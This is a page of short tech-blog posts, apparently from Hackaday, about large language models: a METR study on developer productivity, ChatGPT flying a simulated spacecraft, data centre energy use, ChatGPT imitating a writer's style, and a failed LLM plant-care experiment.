Measuring The Impact Of LLMs On Experienced Developer Productivity

July 11, 2025 by Maya Posch 73 Comments

Recently AI risk and benefit evaluation company METR ran a randomized control test (RCT) on a gaggle of experienced open source developers to gain objective data on how the use of LLMs affects their productivity. Their findings were that using LLM-based tools like Cursor Pro with Claude 3.5/3.7 Sonnet reduced productivity by about 19%, with the full study by [Joel Becker] et al. available as PDF.

This study was also intended to establish a methodology to assess the impact from introducing LLM-based tools in software development. In the RCT, 16 experienced open source software developers were given 246 tasks, after which their effective performance was evaluated.

A large focus of the methodology was on creating realistic scenarios instead of using canned benchmarks. This included adding features to code, bug fixes and refactoring, much as they would do in the work on their respective open source projects. The observed increase in the time it took to complete tasks with the LLM’s assistance was found to be likely due to a range of factors, including over-optimism about the LLM tool capabilities, LLMs interfering with existing knowledge on the codebase, poor LLM performance on large codebases, low reliability of the generated code and the LLM doing very poorly on using tacit knowledge and context.

Although METR suggests that this poor showing may improve over time, it seems fair to argue whether LLM coding tools are at all a useful coding partner.

AI Is Only Coming For Fun Jobs

July 5, 2025 by Bryan Cockfield 39 Comments

In the past few years, what marketers and venture capital firms term “artificial intelligence” but is more often an advanced predictive text model of some sort has started taking people’s jobs and threatening others. But not tedious jobs that society might like to have automated away in the first place. These AI tools have generally been taking rewarding or enjoyable jobs like artist, author, filmmaker, programmer, and composer. This project from a research team might soon be able to add astronaut to that list.

The team was working within the confines of the Kerbal Space Program Differential Game Challenge, an open-source plugin from MIT that allows developers to test various algorithms and artificial intelligences in simulated spacecraft situations. Generally, purpose-built models are used here with many rounds of refinement and testing, but since this process can be time consuming and costly the researchers on this team decided to hand over control to ChatGPT with only limited instructions. A translation layer built by the researchers allows generated text to be converted to spacecraft controls.

We’ll note that, at least as of right now, large language models haven’t taken the jobs of any actual astronauts yet. The game challenge is generally meant for non-manned spacecraft like orbital satellites which often need to make their own decisions to maintain orbits and avoid obstacles. This specific model was able to place second in a recent competition as well, although we’ll keep rooting for humans in certain situations like these.

AI Might Kill Us All (With Carbon Emissions)

July 3, 2025 by Navarre Bartz 39 Comments

So-called artificial intelligence (AI) is all the rage right now between your grandma asking ChatGPT how to code in Python or influencers making videos without having to hire extras, but one growing concern is where the power is going to come from for the data centers. The MIT Technology Review team did a deep dive on what the current situation is and whether AI is going to kill us all (with carbon emissions).

Probably of most interest to you, dear hacker, is how they came up with their numbers. With no agreed upon methods and different companies doing different types of processing there were a number of assumptions baked into their estimates. Given the lack of information for closed-source models, Open Source models were used as the benchmark for energy usage and extrapolated for the industry as a whole. Unsurprisingly, larger models have a larger energy usage footprint.

While data center power usage remained roughly the same from 2005 to 2017 as increases in efficiency offset the increase in online services, data centers doubled their energy consumption by 2023 from those earlier numbers. The power running into those data centers is 48% more carbon intensive than the US average already, and expected to rise as new data centers push for increased fossil fuel usage, like Meta in Louisiana or the X data center found to be using methane generators in violation of the Clean Air Act.

Technology Review did find “researchers estimate that if data centers cut their electricity use by roughly half for just a few hours during the year, it will allow utilities to handle some additional 76 gigawatts of new demand.” This would mean either reallocating requests to servers in other geographic regions or just slowing down responses for the 80-90 hours a year when the grid is at its highest loads.

If you’re interested in just where a lot of the US-based data centers are, check out this map from NREL. Still not sure how these LLMs even work? Here’s an explainer for you.

ChatGPT & Me. ChatGPT Is Me!

May 16, 2025 by Jenny List 64 Comments

For a while now part of my email signature has been a quote from a Hackaday commenter insinuating that an article I wrote was created by a “Dumb AI”. You have my sincerest promise that I am a humble meatbag scribe just like the rest of you, indeed one currently nursing a sore shoulder due to a sporting injury, so I found the comment funny in a way its writer probably didn’t intend. Like many in tech, I maintain a skepticism about the future role of large-language-model generative AI, and have resisted the urge to drink the Kool-Aid you will see liberally flowing at the moment.

Hackaday Is Part Of The Machine

As you’ll no doubt be aware, these large language models work by gathering a vast corpus of text, and doing their computational tricks to generate their output by inferring from that data. They can thus create an artwork in the style of a painter who receives no reward for the image, or a book in the voice of an author who may be struggling to make ends meet. From the viewpoint of content creators and intellectual property owners, it’s theft on a grand scale, and you’ll find plenty of legal battles seeking to establish the boundaries of the field.

Anyway, once an LLM has enough text from a particular source, it can do a pretty good job of writing in that style. ChatGPT for example has doubtless crawled the whole of Hackaday, and since I’ve written thousands of articles in my nearly a decade here, it’s got a significant corpus of my work. Could it write in my style? As it turns out, yes it can, but not exactly. I set out to test its forging skill. Continue reading “ChatGPT & Me. ChatGPT Is Me!” →

“Man And Machine” Vs “Man Vs Machine”

May 10, 2025 by Elliot Williams 10 Comments

Every time we end up talking about 3D printers, Al Williams starts off on how bad he is in a machine shop. I’m absolutely sure that he’s exaggerating, but the gist is that he’s much happier to work on stuff in CAD and let the machine take care of the precision and fine physical details. I’m like that too, but with me, it’s the artwork.

I can’t draw to save my life, but once I get it into digital form, I’m pretty good at manipulating images. And then I couldn’t copy that out into the real world, but that’s what the laser cutter is for, right? So the gameplan for this year’s Mother’s Day gift (reminder!) is three-way. I do the physical design, my son does the artwork, we combine them in FreeCAD and then hand it off to the machine. Everyone is playing to their strengths.

So why does it feel a little like cheating to just laser-cut out a present? I’m not honestly sure. My grandfather was a trained architectural draftsman before he let his artistic side run wild and went off to design jewellery. He could draw a nearly perfect circle with nothing more than a pencil, but he also used a French curve set, a pantograph, and a rolling architect’s ruler when they were called for. He had his tools too, and I bet he’d see the equivalence in mine.

People have used tools since the stone age, and the people who master their tools transcend them, and produce work where the “human” shines through despite having traced a curve or having passed the Gcode off to the cutter. If you doubt this, I’ll remind you of the technological feat that is the piano, with which people nonetheless produce music that doesn’t make you think of the hammers or of the tremendous cast metal frame. The tech disappears into the creation.

I’m sure there’s a parable here for our modern use of AI too, but I’ve got a Mother’s Day present to finish.

Comparing ‘AI’ For Basic Plant Care With Human Brown Thumbs

April 29, 2025 by Maya Posch 18 Comments

The future of healthy indoor plants, courtesy of AI. (Credit: [Liam])

Like so many of us, [Liam] has a big problem. Whether it’s the curse of Brown Thumbs or something else, those darn houseplants just keep dying despite guides always telling you how incredibly easy it is to keep them from wilting with a modicum of care each day, even without opting for succulents or cactuses. In a fit of despair [Liam] decided to pin his hopes on what we have come to accept as the Savior of Humankind, namely ‘AI’, which can stand for a lot of things, but it’s definitely really smart and can even generate pretty pictures, which is something that the average human can not. Hence it’s time to let an LLM do all the smart plant caring stuff with ‘PlantMom’.

Since LLMs so far don’t come with physical appendages by default, some hardware had to be plugged together to measure parameters like light, temperature and soil moisture. Add to this a grow light and a water pump and all that remained was to tell the LMM using an extensive prompt, containing Python code, what it should do (keep the the plant alive), and what Python methods are available. All that was left now was to let the Google’s Gemma 3 handle it.

To say that this resulted in a dramatic failure along with what reads like an emotional breakdown on the part of the LLM would be an understatement. The LLM insisted on turning the grow light on when it should be off and had the most erratic watering responses imaginable based on absolutely incorrect interpretations of the ADC data, flipping dry and wet. After this episode the poor chili plant’s soil was absolutely saturated and is still trying to dry out, while the ongoing LLM experiment, with an empty water tank, has the grow light blasting more often than a weed farm.

So far it seems like that the humble state machine’s job is still safe from being taken over by ‘AI’, and not even brown thumb folk can kill plants this efficiently.

FLOSS Weekly Episode 830: Vibes

April 23, 2025 by Jonathan Bennett 4 Comments

This week, Jonathan Bennett and Randal Schwartz chat with Allen Firstenberg about Google’s AI plans, Vibe Coding, and Open AI! What’s the deal with agentic AI, how close are we to Star Trek, and where does Open Source fit in? Watch to find out!

Continue reading “FLOSS Weekly Episode 830: Vibes” →